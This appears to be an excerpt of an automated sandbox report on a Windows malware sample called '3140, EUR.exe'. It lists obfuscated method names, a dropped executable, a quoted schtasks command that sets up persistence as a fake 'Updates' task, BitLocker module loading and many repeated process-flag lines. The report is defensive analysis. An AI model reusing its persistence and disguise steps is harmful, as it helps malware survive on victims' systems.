Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, onTDHLANSwQB4GuLwN.cs	High entropy of concatenated method names: 'j85gV69F7r', 'fQBgsJP8am', 'DrogYioepT', 'STxgk2JVed', 'YZegEenEPY', 'gUlguBYDUy', 'HM4gS3HYvN', 'wcngqNglPH', 'rHsgKM2jnY', 'pdSgD7eY8H'
Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, IYkmttbvFwlONMhZ0Rx.cs	High entropy of concatenated method names: 'kMQQotPATr', 'DvbQHHRfF4', 'YppQ3EC2ta', 'soxiwxLhn64WOuaRTjx', 'hfOZ0vLDSJYTJd5yiSX', 'ABEoHqLyq7Mlqo8ZsID', 'VDNC2BLijpO2avvODsu'
Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, BNDjbyKEiDpGcvSWK6.cs	High entropy of concatenated method names: 's4OaUwRsN5', 'omxaJO2h34', 'o1ja2jO0ZA', 'VZwa7kFRkK', 'g5OaVtx0EM', 'I82ax1xx4K', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, kBEQvpZQ0mEMjME0yK.cs	High entropy of concatenated method names: 'OiwbOnTDHL', 'KSwb6QB4Gu', 'u1dbWL6Nvw', 'm4EblFfnbA', 'ROLbwAq7aN', 'QoTbf1Jas5', 'd1IOlxRikxuKcwmNfd', 'OAkZTBWMrF62p7bvaJ', 'TjKbbdlqL5', 'ctpb1vNpUo'
Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, cxJt6jqq06XAko1daI.cs	High entropy of concatenated method names: 'MjFayewvC6', 'LaAagwfh9r', 'putaPiDfAL', 'xMxan3XE2N', 'cDCatphpn2', 'NohaOxuoAG', 'e1ea6Zbxay', 'foYarmwqf4', 'Q6NaWUVRP3', 'HvAalfQDL5'
Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, a5HLPykg5ohEWJsiPN.cs	High entropy of concatenated method names: 'CbW8WePhVD', 'XcM8lHcDOD', 'ToString', 'AnT8yq2R3M', 'HSA8gpxrBs', 'arR8PAG5b7', 'ori8no1XOc', 'z9E8tGlT7n', 'GD38ObUWPP', 'kqH86cXkdf'
Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, r35OtXmVa9mbccyjMN.cs	High entropy of concatenated method names: 'GqN9A6Nu4o', 'HY99ceitjo', 'u7h9UpcmJd', 'QAh9J9v5fP', 'sI097b0Rns', 'FDm9xINIbs', 'WmU9dkDDfS', 'jLg9LqBfYT', 'nM690fTZBY', 'Vjv9GF6unO'
Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, IaNmoTU1Jas5HiM3Qc.cs	High entropy of concatenated method names: 'NU9tFHp9wM', 'Xt3tgqpOUW', 'vkatny9ZeY', 'XkXtOZyo7N', 'Nr4t68apne', 'UotnEQ2NDd', 'KPLnuglZau', 'pI9nS9V4XI', 'EROnqWn4Rf', 'LBmnKpfMWa'
Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, pnbAqGRE0nfnZVOLAq.cs	High entropy of concatenated method names: 'WDZnhGnyPl', 'HKUnencVPS', 'D67P2SMoNA', 'vcMP7nDIYp', 'EwsPxs5dK3', 'bEvPNTTeCZ', 'iILPdy2bA8', 'LqGPLuxKGj', 'McWPMhMmAC', 'O11P0RNTOw'
Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, DgRGmDbjU6lUJhfE0v8.cs	High entropy of concatenated method names: 'Q4gIobQTJ8', 'KWNIHTEJ1U', 'iuTI30J0uV', 'CiDIiyiTDd', 'pixIhySfPL', 'yvtITgMiJD', 'yvGIe5ejf5', 'WcOIAwXiq2', 'vYwIctymfh', 'KTPIRN74xQ'
Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, SwCftK6S58okDsOPI5.cs	High entropy of concatenated method names: 'mDC1F5ltau', 'tjx1yOlwS4', 'kwD1gP2LKW', 'c9a1PyosR3', 'Vvd1n0hi5L', 'ntV1tj2eIq', 'kQM1Oy0TGk', 'p6b1692Csb', 'e8b1rosvOx', 'xQZ1WkV8GJ'
Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, clSYfYveg2noAM7P8e.cs	High entropy of concatenated method names: 'zaw3vYJ4j', 'o7ZixLHgG', 'slFT8l8fa', 'LsreWu3f4', 'PJ4cWU7FJ', 'oYXRUeRCt', 'jUvTWwDYFDErknv2Yj', 'N69VBpyC4Pe0SVqBKs', 'PALagLMvR', 'rmbQ5Ef4Z'
Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, k9RBG6DgUfX4TknVHW.cs	High entropy of concatenated method names: 'pwGIbi3Nr6', 'o5QI1qmcrr', 'xXSIZjhFbH', 'z32IyPorgr', 'HShIgQ5IfA', 'D1FInV51O6', 'NjuItTFKqN', 'qjraScI4Pl', 'pXJaq1RNdP', 'c0ZaKLWkId'
Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, DZt0vvzJwZJilcpPKx.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'W4dI9t8Yp5', 'c46IwoIdLE', 'RDHIfjAALG', 'djaI88TWbu', 'geSIaX9G3U', 'kLBIIiUOlY', 'tb5IQs107j'
Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, okXpofgYeVULwIjxF3.cs	High entropy of concatenated method names: 'Dispose', 'G9xbKnYpPX', 'NIUvJBjByq', 'z3Ell8RTx7', 'V1xbDJt6jq', 'N6XbzAko1d', 'ProcessDialogKey', 'qIhvjNDjby', 'UiDvbpGcvS', 'lK6vv69RBG'
Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, MU4Oupc1dL6Nvwl4EF.cs	High entropy of concatenated method names: 'UZlPi1EFky', 'kMwPTrTb3E', 'S4tPAfFKQV', 'TkpPcjHuyO', 'OVhPwQ9Mkf', 'tNNPfSRpkZ', 'sbQP8yc3h0', 'Bk6PabtRGE', 'GfyPIUPLvy', 'e1nPQIS6uG'
Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, jHN6pNdJjWN1aRaPiD.cs	High entropy of concatenated method names: 'PPWOy6bVhC', 'ATAOPMst2D', 'UucOtTDklA', 'kHRtDnXeDV', 'd6jtz6Flk8', 'nuBOj4JCNs', 'CMIObyGNWb', 'wN0OvguPFP', 'PfRO1xE4ao', 'zHDOZLdog4'
Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, jDZx6yMTIJBBgdc5M9.cs	High entropy of concatenated method names: 'r6yOodSaw5', 'hxPOHYrow8', 'N8EO3rHnY2', 'YJ7OigrIYF', 'RZCOh3gLVY', 'n1vOT1ewCW', 'WiGOexAc77', 'rFGOAoXNM6', 'xtaOcO7p35', 'n3MORrUdXs'
Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, c43BOPb17cTkFlcAFvH.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'wJTQVKTOlQ', 'D13Qsw5gtr', 'YvYQYZynJx', 'udqQkun7f0', 'wq8QEfdWml', 'auYQurFs2x', 'TO0QSablKt'
Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, JaiguuulGFOV4gjVP9.cs	High entropy of concatenated method names: 'Lly8qWMWPl', 'uEC8Dfy0PB', 'vxHajrQ2nt', 'zwPabruD86', 'WPT8GMJtUa', 'Dgu8XI6Duh', 'WcN8mPROuG', 'FPi8VVirr5', 'Sv88sEZQQg', 'Gj38YidP0k'
Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, onTDHLANSwQB4GuLwN.cs	High entropy of concatenated method names: 'j85gV69F7r', 'fQBgsJP8am', 'DrogYioepT', 'STxgk2JVed', 'YZegEenEPY', 'gUlguBYDUy', 'HM4gS3HYvN', 'wcngqNglPH', 'rHsgKM2jnY', 'pdSgD7eY8H'
Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, IYkmttbvFwlONMhZ0Rx.cs	High entropy of concatenated method names: 'kMQQotPATr', 'DvbQHHRfF4', 'YppQ3EC2ta', 'soxiwxLhn64WOuaRTjx', 'hfOZ0vLDSJYTJd5yiSX', 'ABEoHqLyq7Mlqo8ZsID', 'VDNC2BLijpO2avvODsu'
Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, BNDjbyKEiDpGcvSWK6.cs	High entropy of concatenated method names: 's4OaUwRsN5', 'omxaJO2h34', 'o1ja2jO0ZA', 'VZwa7kFRkK', 'g5OaVtx0EM', 'I82ax1xx4K', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, kBEQvpZQ0mEMjME0yK.cs	High entropy of concatenated method names: 'OiwbOnTDHL', 'KSwb6QB4Gu', 'u1dbWL6Nvw', 'm4EblFfnbA', 'ROLbwAq7aN', 'QoTbf1Jas5', 'd1IOlxRikxuKcwmNfd', 'OAkZTBWMrF62p7bvaJ', 'TjKbbdlqL5', 'ctpb1vNpUo'
Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, cxJt6jqq06XAko1daI.cs	High entropy of concatenated method names: 'MjFayewvC6', 'LaAagwfh9r', 'putaPiDfAL', 'xMxan3XE2N', 'cDCatphpn2', 'NohaOxuoAG', 'e1ea6Zbxay', 'foYarmwqf4', 'Q6NaWUVRP3', 'HvAalfQDL5'
Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, a5HLPykg5ohEWJsiPN.cs	High entropy of concatenated method names: 'CbW8WePhVD', 'XcM8lHcDOD', 'ToString', 'AnT8yq2R3M', 'HSA8gpxrBs', 'arR8PAG5b7', 'ori8no1XOc', 'z9E8tGlT7n', 'GD38ObUWPP', 'kqH86cXkdf'

Source: C:\Users\user\Desktop\3140, EUR.exe

File created: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\3140, EUR.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lkuPOyvaWlIu" /XML "C:\Users\user\AppData\Local\Temp\tmpE737.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\3140, EUR.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
